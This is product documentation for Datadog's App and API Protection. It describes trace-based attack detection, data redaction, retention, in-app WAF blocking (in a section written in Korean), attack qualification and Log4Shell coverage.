Overview

Datadog App and API Protection provides observability into application-level attacks that aim to exploit code-level vulnerabilities or abuse the business logic of your application, and into any bad actors targeting your systems. It provides:

• Observability into attacks: Provides insight into application-level attacks targeting code vulnerabilities or business logic.
• Trace-based monitoring: Utilizes the same tracing libraries as Datadog APM to monitor traffic and detect security threats.
• Security signals: Automatically generates security signals when attacks or business logic abuses are detected, focusing on meaningful threats rather than individual attempts.
• Notification Options: Offers notifications through Slack, email, or PagerDuty based on security signal settings.
• Embedded security: Integrated within the application, providing better threat identification and classification by accessing trace data.
• Enhanced WAF functionality: Functions like a Web Application Firewall (WAF) but with additional application context, improving accuracy and reducing false positives.

Identify services exposed to application attacks

Datadog App and API Protection Threat Management uses the information APM is already collecting to flag traces containing attack attempts. While APM collects a sample of your application traffic, enabling App and API Protection in the tracing library is necessary to effectively monitor and protect your services.

Services exposed to application attacks are highlighted directly in the security views embedded in APM (Software Catalog, Service Page, Traces).

Datadog Threat Monitoring and Detection identifies bad actors by collecting client IP addresses, login account info (for example, user account/ID), and manually-added user tags on all requests.

Compatibility

For Datadog App and API Protection to be compatible with your Datadog configuration, you must have APM enabled and sending traces to Datadog. App and API Protection uses the same libraries used by APM, so you don’t need to deploy and maintain another library.

Steps to enable Datadog App and API Protectionon are specific to each runtime language. Check to see if your language is supported in the App and API Protection prerequisites for each product.

Serverless monitoring

Datadog App and API Protection for AWS Lambda provides deep visibility into attackers targeting your functions. With distributed tracing providing a context-rich picture of the attack, you can assess the impact and remediate the threat effectively.

Read Enabling App and API Protection for Serverless for information on setting it up.

Performance

Datadog App and API Protection uses processes already contained in the Agent and APM, so there are negligible performance implications when using it.

When APM is enabled, the Datadog library generates distributed traces. Datadog App and API Protection flags security activity in traces by using known attack patterns. Correlation between the attack patterns and the execution context provided by the distributed trace triggers security signals based on detection rules.

Data sampling and retention

In the tracing library, Datadog App and API Protection collects all traces that include security data. A default retention filter ensures the retention of all security-related traces in the Datadog platform.

Data for security traces is kept for 90 days. The underlying trace data is kept for 15 days.

Data privacy

By default, App and API Protection collects information from security traces to help you understand why the request was flagged as suspicious. Before sending the data, App and API Protection scans it for patterns and keywords that indicate that the data is sensitive. If the data is deemed sensitive, it is replaced with a <redacted> flag. This indicates that the request was suspicious, but that the request data could not be collected because of data security concerns.

Here are some examples of data that is flagged as sensitive by default:

• pwd, password, ipassword, pass_phrase
• secret
• key, api_key, private_key, public_key
• token
• consumer_id, consumer_key, consumer_secret
• sign, signed, signature
• bearer
• authorization
• BEGIN PRIVATE KEY
• ssh-rsa

To configure the information redacted by App and API Protection, refer to the data security configuration

Threat detection methods

Datadog uses multiple pattern sources, including the OWASP ModSecurity Core Rule Set to detect known threats and vulnerabilities in HTTP requests. When an HTTP request matches one of the OOTB detection rules, a security signal is generated in Datadog.

Automatic Threat Patterns Updates: If your service is running with an Agent with Remote Configuration enabled and a tracing library version that supports it , the threat patterns being used to monitor your service are automatically updated whenever Datadog publishes updates.

Security Signals are automatically created when Datadog detects meaningful attacks targeting your production services. It provides you with visibility on the attackers and the targeted services. You can set custom detection rules with thresholds to determine which attacks you want to be notified about.

Built-in protection

내 서비스가 원격 구성이 활성화되어 있고 이 구성을 지원하는 추적 라이브러리 버전이 있는 에이전트를 사용 중인 경우, 에이전트나 추적 라이브러리에 추가 구성을 하지 않고도 Datadog UI에서 공격과 공격자를 차단할 수 있습니다.

ASM Protect는 위협 감지 뿐만 아니라 공격과 공격자의 속도를 늦추는 차단 활동을 합니다. 트래픽을 조사할 때 규칙을 넓은 범위로 적용하는 경계 WAF와 달리, ASM은 내 애플리케이션의 전체 컨텍스트(데이터베이스, 프레임워크, 프로그래밍 언어)를 사용해 가장 효율적인 조사 규칙으로 범위를 좁혀 적용합니다.

ASM은 APM(Application Performance Monitoring)과 동일한 추적 라이브러리을 사용해 다음과 같은 위험으로부터 애플리케이션을 보호합니다.

• 공격: ASM의 인앱 WAF은 모든 수신 트래픽을 조사하고 패턴이 일치하는지를 점검해 악성 트래픽(보안 트레이스)을 차단합니다.
• 공격자: 라이브러리에서 수집하고 Security Signals에서 플래그된 인사이트를 기반으로 내 애플리케이션에 공격을 실행한 IP 주소와 인증 사용자를 감지합니다.

Datadog 추적 라이브러리에서 보안 트레이스를 실시간으로 차단합니다. 차단 내역은 Datadog에 저장되며, Datadog 에이전트가 안전하게 자동으로 저장 내용을 가져와 인프라스트럭처에 배포하고 서비스에 적용합니다. 자세한 내용은 원격 구성 작동 방식을 참고하세요.

인앱 WAF, IP 차단, 사용자 차단 등과 같은 보호 기능을 활용하려면 보호를 참고하세요.

Attack attempt qualification

Leveraging distributed tracing information, attacks attempts are qualified as safe, unknown, or harmful.

• Attack attempts qualified as safe cannot breach your application, for example, when a PHP injection attack targets a service written in Java.
• An unknown qualification is decided when there is not enough information to make a definitive judgement about the attack’s probability of success.
• A harmful qualification is highlighted when there is evidence that a code level vulnerability has been found by the attacker.

Threat monitoring coverage

Datadog App and API Protection includes over 100 attack signatures that help protect against many different kinds of attacks, including, but not limited to, the following categories:

• SQL injections
• Code injections
• Shell injections
• NoSQL injections
• Cross-Site Scripting (XSS)
• Server-side Request Forgery (SSRF)

API security

Datadog App and API Protection provides visibility into threats targeting your APIs. Use the Endpoints list in Software Catalog to monitor API health and performance metrics, where you can view attacks targeting your APIs. This view includes the attacker’s IP and authentication information, as well as request headers showing details about how the attack was formed. Using both App and API Protection and API management, you can maintain a comprehensive view of your API attack surface, and respond to mitigate threats.

How Datadog App and API Protection protects against Log4Shell

Datadog App and API Protection identifies Log4j Log4Shell attack payloads and provides visibility into vulnerable apps that attempt to remotely load malicious code. When used in tandem with the rest of Datadog’s Cloud SIEM, you can investigate to identify common post-exploitation activity, and proactively remediate potentially vulnerable Java web services acting as an attack vector.